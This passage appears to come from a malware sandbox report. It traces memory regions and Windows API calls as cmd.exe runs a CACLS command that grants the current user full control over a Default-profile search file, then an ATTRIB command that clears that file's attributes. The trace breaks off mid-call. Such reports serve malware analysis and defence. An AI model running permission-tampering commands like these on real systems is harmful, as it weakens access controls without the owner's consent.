32421 start_va = 0x4c0000 end_va = 0x10bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 32422 start_va = 0x10c0000 end_va = 0x10c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 32423 start_va = 0x10d0000 end_va = 0x1232fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010d0000" filename = "" Region: id = 32424 start_va = 0x1240000 
end_va = 0x1240fff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 32425 start_va = 0x1250000 end_va = 0x1250fff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 32426 start_va = 0x1260000 end_va = 0x152efff entry_point = 0x1260000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 758 os_tid = 0xcf8 [0217.279] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f984 | out: lpSystemTimeAsFileTime=0x28f984*(dwLowDateTime=0xb64f0e40, dwHighDateTime=0x1d440a9)) [0217.279] GetCurrentProcessId () returned 0xa0c [0217.279] GetCurrentThreadId () returned 0xcf8 [0217.279] GetTickCount () returned 0x3cc05 [0217.279] QueryPerformanceCounter (in: lpPerformanceCount=0x28f97c | out: lpPerformanceCount=0x28f97c*=27406781726) returned 1 [0217.279] GetModuleHandleA (lpModuleName=0x0) returned 0x49f60000 [0217.279] __set_app_type (_Type=0x1) [0217.279] __p__fmode () returned 0x76b331f4 [0217.279] __p__commode () returned 0x76b331fc [0217.279] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f821a6) returned 0x0 [0217.279] __getmainargs (in: _Argc=0x49f84238, _Argv=0x49f84240, _Env=0x49f8423c, _DoWildCard=0, _StartInfo=0x49f84140 | out: _Argc=0x49f84238, _Argv=0x49f84240, _Env=0x49f8423c) returned 0 [0217.280] GetCurrentThreadId () returned 0xcf8 [0217.280] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcf8) returned 0x38 [0217.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.280] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0217.280] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.280] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0217.280] 
RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f914 | out: phkResult=0x28f914*=0x0) returned 0x2 [0217.280] VirtualQuery (in: lpAddress=0x28f94b, lpBuffer=0x28f8e4, dwLength=0x1c | out: lpBuffer=0x28f8e4*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.280] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f8e4, dwLength=0x1c | out: lpBuffer=0x28f8e4*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0217.280] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f8e4, dwLength=0x1c | out: lpBuffer=0x28f8e4*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0217.280] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f8e4, dwLength=0x1c | out: lpBuffer=0x28f8e4*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.280] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f8e4, dwLength=0x1c | out: lpBuffer=0x28f8e4*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0217.280] GetConsoleOutputCP () returned 0x1b5 [0217.280] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f84260 | out: lpCPInfo=0x49f84260) returned 1 [0217.280] SetConsoleCtrlHandler (HandlerRoutine=0x49f7e72a, Add=1) returned 1 [0217.280] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.281] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0217.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.281] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f841ac | out: lpMode=0x49f841ac) returned 1 [0217.281] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0217.281] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0217.281] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.281] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f841b0 | out: lpMode=0x49f841b0) returned 1 [0217.281] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.281] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0217.281] GetEnvironmentStringsW () returned 0x3d0228* [0217.281] FreeEnvironmentStringsW (penv=0x3d0228) returned 1 [0217.282] GetEnvironmentStringsW () returned 0x3d0228* [0217.282] FreeEnvironmentStringsW (penv=0x3d0228) returned 1 [0217.282] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e884 | out: phkResult=0x28e884*=0x40) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x0, lpData=0x28e890*=0xb8, lpcbData=0x28e888*=0x1000) returned 0x2 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, lpData=0x28e890*=0x1, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x0, lpData=0x28e890*=0x1, lpcbData=0x28e888*=0x1000) returned 0x2 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, lpData=0x28e890*=0x0, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, 
lpData=0x28e890*=0x40, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, lpData=0x28e890*=0x40, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x0, lpData=0x28e890*=0x40, lpcbData=0x28e888*=0x1000) returned 0x2 [0217.282] RegCloseKey (hKey=0x40) returned 0x0 [0217.282] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e884 | out: phkResult=0x28e884*=0x40) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x0, lpData=0x28e890*=0x40, lpcbData=0x28e888*=0x1000) returned 0x2 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, lpData=0x28e890*=0x1, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x0, lpData=0x28e890*=0x1, lpcbData=0x28e888*=0x1000) returned 0x2 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, lpData=0x28e890*=0x0, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, lpData=0x28e890*=0x9, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] 
RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, lpData=0x28e890*=0x9, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x0, lpData=0x28e890*=0x9, lpcbData=0x28e888*=0x1000) returned 0x2 [0217.282] RegCloseKey (hKey=0x40) returned 0x0 [0217.282] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b3 [0217.282] srand (_Seed=0x5b8863b3) [0217.282] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"" [0217.282] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"" [0217.283] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f85260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.283] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d1988, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0217.283] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.283] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.283] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0217.283] 
_wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0217.283] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0217.283] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0217.283] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0217.283] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0217.283] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0217.283] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0217.283] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0217.283] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0217.283] GetEnvironmentStringsW () returned 0x3d2378* [0217.284] FreeEnvironmentStringsW (penv=0x3d2378) returned 1 [0217.284] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.284] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0217.284] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0217.284] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0217.284] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0217.284] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0217.284] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0217.284] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0217.284] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0217.284] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0217.284] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f650 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.284] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f650, lpFilePart=0x28f64c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f64c*="Desktop") returned 0x18 [0217.284] 
GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.284] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f3cc | out: lpFindFileData=0x28f3cc) returned 0x3d0a08 [0217.284] FindClose (in: hFindFile=0x3d0a08 | out: hFindFile=0x3d0a08) returned 1 [0217.284] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f3cc | out: lpFindFileData=0x28f3cc) returned 0x3d0a08 [0217.284] FindClose (in: hFindFile=0x3d0a08 | out: hFindFile=0x3d0a08) returned 1 [0217.284] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f3cc | out: lpFindFileData=0x28f3cc) returned 0x3d0a08 [0217.285] FindClose (in: hFindFile=0x3d0a08 | out: hFindFile=0x3d0a08) returned 1 [0217.285] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.285] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0217.285] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0217.285] GetEnvironmentStringsW () returned 0x3d0228* [0217.285] FreeEnvironmentStringsW (penv=0x3d0228) returned 1 [0217.285] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f85260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.285] GetConsoleOutputCP () returned 0x1b5 [0217.285] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f84260 | out: lpCPInfo=0x49f84260) returned 1 [0217.285] GetUserDefaultLCID () returned 0x409 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f84950, cchData=8 | out: lpLCData=":") returned 2 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f790, cchData=128 | out: lpLCData="0") returned 2 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f790, cchData=128 | out: lpLCData="0") returned 2 [0217.286] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x24, lpLCData=0x28f790, cchData=128 | out: lpLCData="1") returned 2 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f84940, cchData=8 | out: lpLCData="/") returned 2 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f84d80, cchData=32 | out: lpLCData="Mon") returned 4 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f84d40, cchData=32 | out: lpLCData="Tue") returned 4 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f84d00, cchData=32 | out: lpLCData="Wed") returned 4 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f84cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f84c80, cchData=32 | out: lpLCData="Fri") returned 4 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f84c40, cchData=32 | out: lpLCData="Sat") returned 4 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f84c00, cchData=32 | out: lpLCData="Sun") returned 4 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f84930, cchData=8 | out: lpLCData=".") returned 2 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f84920, cchData=8 | out: lpLCData=",") returned 2 [0217.286] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0217.287] GetConsoleTitleW (in: lpConsoleTitle=0x3c0940, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.287] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.287] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0217.287] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0217.287] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0217.288] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49f90640, 
nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0217.288] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0217.289] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0217.289] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0217.289] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0217.289] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0217.289] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0217.289] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0217.291] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0217.291] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0217.291] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0217.291] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0217.291] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0217.291] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0217.291] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0217.292] GetConsoleTitleW (in: lpConsoleTitle=0x28f424, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.293] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0217.293] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0217.293] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0217.293] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0217.293] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0217.293] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0217.293] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0217.293] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0217.293] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0217.293] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0217.293] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0217.293] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0217.293] _wcsicmp (_String1="CACLS", 
_String2="DATE") returned -1 [0217.293] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0217.293] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0217.293] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0217.293] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0217.293] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0217.293] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0217.293] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0217.293] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0217.293] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0217.293] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0217.293] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0217.293] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0217.293] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0217.293] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0217.293] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0217.293] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0217.293] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0217.293] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0217.293] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0217.293] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0217.293] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0217.293] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0217.293] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0217.293] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0217.293] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0217.293] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0217.294] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0217.294] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0217.294] _wcsicmp 
(_String1="CACLS", _String2="MKLINK") returned -10 [0217.294] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0217.294] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0217.294] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0217.294] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0217.294] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0217.294] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0217.294] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0217.294] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0217.294] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0217.294] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0217.294] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0217.294] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0217.294] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0217.294] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0217.294] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0217.294] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0217.294] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0217.294] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0217.294] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0217.294] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0217.294] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0217.294] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0217.294] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0217.294] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0217.294] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0217.294] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0217.294] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0217.294] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0217.294] _wcsicmp 
(_String1="CACLS", _String2="SETLOCAL") returned -16 [0217.294] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0217.294] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0217.295] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0217.295] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0217.295] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0217.295] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0217.295] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0217.295] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0217.295] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0217.295] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0217.295] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0217.295] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0217.295] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0217.295] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0217.295] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0217.295] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0217.295] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0217.296] SetErrorMode (uMode=0x0) returned 0x0 [0217.296] SetErrorMode (uMode=0x1) returned 0x0 [0217.296] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3d1db8, lpFilePart=0x28ef44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28ef44*="Desktop") returned 0x18 [0217.296] SetErrorMode (uMode=0x0) returned 0x1 [0217.296] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.296] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.341] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f90640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.341] FindClose (in: hFindFile=0x3c0f38 | out: hFindFile=0x3c0f38) returned 1 [0217.342] FindClose (in: hFindFile=0x3c0f38 | out: hFindFile=0x3c0f38) returned 1 [0217.342] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0217.342] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0217.342] GetConsoleTitleW (in: lpConsoleTitle=0x28f1b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.342] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f040, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f108 | out: lpAttributeList=0x28f040, lpSize=0x28f108) returned 1 [0217.342] UpdateProcThreadAttribute (in: lpAttributeList=0x28f040, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f100, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f040, lpPreviousValue=0x0) returned 1 [0217.342] GetStartupInfoW (in: lpStartupInfo=0x28effc | out: lpStartupInfo=0x28effc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0217.342] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0217.343] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28f09c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", 